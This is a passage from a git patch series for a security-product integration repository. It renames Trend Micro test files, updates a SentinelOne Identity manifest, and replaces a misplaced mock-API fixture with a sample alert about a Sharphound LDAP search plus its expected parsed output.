rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_registry.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
From da65007e11116a5b5a457a097df379c56cd4d66b Mon Sep 17 00:00:00 2001
From: vg-svitla <131353512+vg-svitla@users.noreply.github.com>
Date: Mon, 2 Dec 2024 15:24:03 +0200
Subject: [PATCH 115/150] Update SentinelOne/identity/_meta/manifest.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Sébastien Quioc
---
 SentinelOne/identity/_meta/manifest.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml
index 1d18ad943..e8b52a2d5 100644
--- a/SentinelOne/identity/_meta/manifest.yml
+++ b/SentinelOne/identity/_meta/manifest.yml
@@ -1,6 +1,8 @@
 uuid: b502e522-6996-4b12-9538-f69326b68243
-name: SentinelOne Singularity Identity
+name: SentinelOne Singularity Identity [ALPHA]
 slug: sentinelone-singularity-identity
+automation_connector_uuid: 2d772558-821d-4663-87bd-af28bbb8415a
+automation_module_uuid: ff675e74-e5c1-47c8-a571-d207fc297464
 description: >-
 SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats.
From c97f9cc3ebe0cc7aa224c75fb383f2bbbb3ff18e Mon Sep 17 00:00:00 2001
From: vg-svitla
Date: Mon, 2 Dec 2024 17:26:30 +0200
Subject: [PATCH 116/150] Fix comments
---
 SentinelOne/identity/tests/test_alert_16.json | 47 -------------------
 SentinelOne/identity/tests/test_alert_2.json | 31 ++++++++++--
 2 files changed, 28 insertions(+), 50 deletions(-)
 delete mode 100644 SentinelOne/identity/tests/test_alert_16.json
diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json
deleted file mode 100644
index 0a9dc292d..000000000
--- a/SentinelOne/identity/tests/test_alert_16.json
+++ /dev/null
@@ -1,47 +0,0 @@ -{ - "input": { - "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" - }, - "expected": { - "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}", - "event": { - "category": "intrusion_detection", - "end": "2024-11-22T08:45:50Z", - "kind": "alert", - "provider": "Identity", - "reason": "This events is raised when a LDAP search Query is detected from the endpoint.", 
- "start": "2024-11-22T08:45:50Z", - "type": "info" - }, - "@timestamp": "2024-11-22T08:45:50Z", - "observer": { - "product": "Singularity Identity", - "vendor": "SentinelOne" - }, - "process": { - "command_line": "Sharphound.exe", - "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe", - "hash": { - "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - }, - "name": "sharphound.exe" - }, - "related": { - "hash": [ - "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863" - ] - }, - "sentinelone": { - "identity": { - "attackSurfaces": [ - "IDENTITY" - ], - "classification": "ENUMERATION", - "confidenceLevel": "MALICIOUS", - "id": "01935310-dc47-75de-8925-5f026bd5a705", - "name": "LDAP Search Detected", - "status": "NEW" - } - } - } -} \ No newline at end of file diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json index 39420a5e0..0a9dc292d 100644 --- a/SentinelOne/identity/tests/test_alert_2.json +++ b/SentinelOne/identity/tests/test_alert_2.json 
@@ -1,21 +1,46 @@ { "input": { - "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n 
\"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n 
\"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": 
[],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 
200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": 
\"160c80f4-39c7-494d-a489-06da2e51aa87\",\n \"id\": \"g4qq\",\n \"name\": \"CreateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"email\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"c1d673ba-f7cf-4fd2-8cc8-449017a3ff17\",\n \"id\": \"ofz6\",\n \"name\": \"AuthenticateUserRequest\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"type\\\": \\\"object\\\",\\n \\\"properties\\\": {\\n \\\"phone\\\": { \\\"type\\\": \\\"string\\\" },\\n \\\"password\\\": { \\\"type\\\": \\\"string\\\" }\\n },\\n \\\"required\\\": [\\\"phone\\\", \\\"password\\\"]\\n}\\n\"\n },\n {\n \"uuid\": \"2844853c-c892-4671-9201-0b252711a36b\",\n \"id\": \"w34k\",\n \"name\": \"User\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"id\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"email\\\": \\\"{{faker 'internet.email'}}\\\",\\n \\\"phone\\\": \\\"{{faker 'phone.number' style='international'}}\\\",\\n \\\"createdAt\\\": \\\"{{data 'ISODate'}}\\\",\\n \\\"updatedAt\\\": \\\"{{data 'ISODate'}}\\\",\\n}\"\n },\n {\n \"uuid\": \"e698b979-5934-45f2-8612-5782a8b1e0be\",\n \"id\": \"77fk\",\n \"name\": \"Authentication\",\n \"documentation\": \"\",\n \"value\": \"{\\n \\\"refreshToken\\\": \\\"{{faker 'string.uuid'}}\\\",\\n \\\"accessToken\\\": \\\"{{faker 'string.uuid'}}\\\"\\n}\"\n }\n ],\n \"callbacks\": []\n}" + "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", 
\"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}" }, "expected": { - "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n 
\"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n 
\"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n 
\"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n 
